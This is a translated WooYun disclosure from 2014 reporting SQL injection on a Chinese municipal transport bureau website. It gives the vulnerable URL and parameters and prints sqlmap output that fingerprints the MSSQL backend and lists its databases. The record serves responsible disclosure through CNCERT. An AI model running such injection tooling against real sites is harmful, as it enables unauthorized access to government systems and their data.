
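Vulnerability summary

Bug ID: wooyun-2014-063418

Title: SQL injection at the Jinhua Municipal Transportation Bureau (金华市交通局)

Affected vendor: Jinhua Municipal Transportation Bureau (金华市交通局)

Author: hkmm

Submitted: 2014-06-05 18:51

Fixed: 2014-07-23 19:40

Disclosed: 2014-07-23 19:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]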


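Vulnerability details

Disclosure status:

2014-06-05: Details reported to the vendor; awaiting vendor handling
2014-06-10: Vendor has confirmed; details disclosed to the vendor only
2014-06-20: Details disclosed to core white hats and experts in related fields
2014-06-30: Details disclosed to regular white hats
2014-07-10: Details disclosed to intern white hats
2014-07-23: Details disclosed to the public

Brief description:

A local public-convenience service site has an injection; see below.

Detailed description:

A local public-convenience service site has an injection; see below.

Proof of vulnerability: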

http://www.jhjt.gov.cn/news/newsinfo.jsp?instance_id=14149&lbid=50
Fed it straight to sqlmap:
[21:30:36] [WARNING] the back-end DBMS is not PostgreSQL
[21:30:36] [INFO] testing Microsoft SQL Server
[21:30:36] [INFO] confirming Microsoft SQL Server
[21:30:37] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] jhjt
[*] jhyg
[*] master
[*] model
[*] msdb
[*] tempdb
Database: jhjt
[108 tables]
These tables are really something. All I can say is that when I see a design like this, I can only steer clear.

Suggested fix:


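Copyright notice: when reposting, please credit the source hkmm@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-06-10 16:11

Vendor reply:

CNVD has confirmed and reproduced the situation described, and it has been forwarded via CNCERT to the Zhejiang sub-center for handling.

Latest status:

None yet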